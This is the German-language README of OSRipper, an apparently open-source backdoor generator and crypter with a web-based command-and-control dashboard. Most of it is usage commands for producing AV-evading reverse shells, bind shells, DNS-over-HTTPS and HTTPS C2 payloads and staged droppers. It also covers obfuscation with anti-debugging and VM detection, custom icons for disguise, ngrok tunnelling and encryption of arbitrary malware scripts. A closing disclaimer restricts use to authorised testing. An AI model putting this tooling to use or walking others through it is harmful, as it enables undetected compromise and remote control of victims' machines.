
AV-umgehendes, plattformübergreifendes Backdoor- und Crypter-Framework mit einer integrierten, leichten WebUI

Fortschrittlicher plattformübergreifender Payload-Generator und Crypter mit FUD-Fähigkeiten
Funktionen • Schnellstart • Web-UI • Payload-Typen • Dokumentation
OSRipper ist ein anspruchsvoller, vollständig unerkennbarer (FUD) Backdoor-Generator und Crypter, der für autorisierte Penetrationstests und Red-Team-Operationen entwickelt wurde. Er verfügt über fortschrittliche Umgehungstechniken, mehrere Payload-Typen und eine moderne webbasierte C2-Schnittstelle zur Verwaltung kompromittierter Systeme.
| Payload-Typ | Beschreibung | Anwendungsfall |
|---|---|---|
| Bind-Shell | Öffnet Port auf dem Opferrechner | Direkter Zugriff, wenn Reverse-Verbindungen blockiert sind |
| Reverse TCP Meterpreter | SSL/TLS-verschlüsselte Reverse-Verbindung | Standard-Penetrationstests |
| DNS-over-HTTPS C2 | Verdeckter DoH-basierter Command & Control | Umgehung von Netzwerkbeschränkungen |
| HTTPS C2 | Zertifikatgebundener HTTPS-C2 | Sicherer, authentifizierter C2-Kanal |
| Gestaffelter Payload | Mehrstufige Webauslieferung | Verbesserte Tarnung bei der Bereitstellung |
| Crypter für benutzerdefinierten Code | Verschleierung beliebiger Python-Skripte | Verschlüsselung benutzerdefinierter Payloads |
# Repository klonen
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Abhängigkeiten installieren
pip3 install -r requirements.txt
# Paket installieren
pip3 install -e .
Wichtig – Setup für optionale Funktionen (ngrok, Binärkompilierung) ausführen:
Auf vielen Systemen (insbesondere Linux mit einer extern verwalteten Python-Umgebung) müssen Sie das integrierte Setup ausführen, damit optionale Abhängigkeiten in OSRippers eigener Venv installiert werden. Führen Sie dies einmal nach der Installation durch:
osripper-cli setup
Dadurch wird ~/.local/share/osripper/venv erstellt, pyngrok, nuitka und sandboxed installiert, und alle späteren Ausführungen von osripper / osripper-cli verwenden sie automatisch. Ohne diesen Schritt werden Sie bei --ngrok und --compile aufgefordert, das Setup auszuführen. Verwenden Sie osripper-cli setup --system nur, wenn Sie eine systemweite/user-pip-Installation anstelle der Venv bevorzugen.
Interaktiver Modus:
osripper
# oder
python3 -m osripper
Kommandozeile:
# Reverse-Shell generieren
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# DoH-C2-Payload generieren
osripper-cli doh -d example.com --obfuscate --compile
Web-UI:
# C2-Server mit Web-UI starten
python -m osripper.c2.server example.com --port 5000
# Dashboard unter http://localhost:5000 aufrufen
OSRipper enthält eine moderne webbasierte C2-Schnittstelle zur Verwaltung kompromittierter Systeme.
# Grundlegende Nutzung
python -m osripper.c2.server example.com
# Mit HTTPS
python -m osripper.c2.server example.com --https
# Benutzerdefinierter Port
python -m osripper.c2.server example.com --port 8080
# Mit benutzerdefiniertem Zertifikat
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Sobald der Server läuft, rufen Sie das Dashboard unter den folgenden Adressen auf:
http://localhost:5000https://localhost:5000 (falls aktiviert)Öffnet einen Port auf dem Opferrechner und wartet auf Verbindungen.
osripper-cli bind -p 4444 --obfuscate --compile
Verbindung:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Verschlüsselte Reverse-Verbindung mit SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Verdeckter C2-Kanal unter Verwendung des DNS-over-HTTPS-Protokolls. Umgeht viele Netzwerkbeschränkungen.
# Payload generieren
osripper-cli doh -d example.com --obfuscate --compile
# C2-Server starten
python -m osripper.c2.server example.com
Funktionen:
Sicherer HTTPS-C2 mit Zertifikatbindung zur Authentifizierung.
# Payload generieren (über Web-UI oder CLI)
# C2-Server mit HTTPS starten
python -m osripper.c2.server example.com --https
# Zertifikat-Fingerabdruck abrufen
curl http://localhost:5000/api/cert-fingerprint
Funktionen:
Mehrstufige Webauslieferung für verbesserte Tarnung.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
Verschleierung und Verschlüsselung beliebiger Python-Skripte.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
| Option | Beschreibung |
|---|---|
--obfuscate | Mehrschichtige Verschleierung aktivieren |
--enhanced | Erweiterte Verschleierung (Anti-Debug, VM-Erkennung) |
--compile | Zu eigenständiger Binärdatei kompilieren |
--icon PFAD | Benutzerdefiniertes Symbol für die kompilierte Binärdatei |
--delay | Zufällige Startverzögerung hinzufügen (5–15 Sekunden) |
--output, -o NAME | Ausgabedateiname |
--quiet, -q | Ruhiger Modus (minimale Ausgabe) |
# Voll ausgestattete Reverse-Shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH-C2 mit allen Funktionen
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Benutzerdefinierte Skriptverschlüsselung
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Verwendung von ngrok für dynamische IPs
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ Generierte │
│ Binärdatei │
└─────────────────┘
│
│ Ausführen
▼
┌──────────────────┐
│ Verschleierter │
│ Dropper │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ C2-SERVER │
│ (Web-UI) │
│ │
└─────────────────┘
│
│ Befehl/Antwort
▼
┌─────────────────┐
│ Agent │
│ Ausführung │
└─────────────────┘

# Payload mit ngrok generieren
osripper-cli reverse --ngrok -p 4444
# Den Anweisungen zum Einrichten des Tunnels folgen
# Ausführen: ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.ico
Standard-Verschleierung:
Erweiterte Verschleierung:
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Erweitert
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. C2-Server mit HTTPS starten
python -m osripper.c2.server example.com --https
# 2. Zertifikat-Fingerabdruck abrufen
curl http://localhost:5000/api/cert-fingerprint
# 3. Payload mit Fingerabdruck generieren (über Web-UI)
# Oder den Fingerabdruck bei der Payload-Generierung verwenden
Wir begrüßen Beiträge aus der Sicherheitsforschungs-Community!
git checkout -b feature/amazing-feature)git commit -m 'Füge großartige Funktion hinzu')git push origin feature/amazing-feature)Besonderer Dank gilt der Sicherheitsforschungs-Community und diesen Projekten:
WICHTIG: Dieses Tool wurde zu Bildungszwecken und für autorisierte Penetrationstests entwickelt.
Die Entwickler sind nicht verantwortlich für den Missbrauch dieser Software. Benutzer müssen alle geltenden Gesetze und Vorschriften einhalten.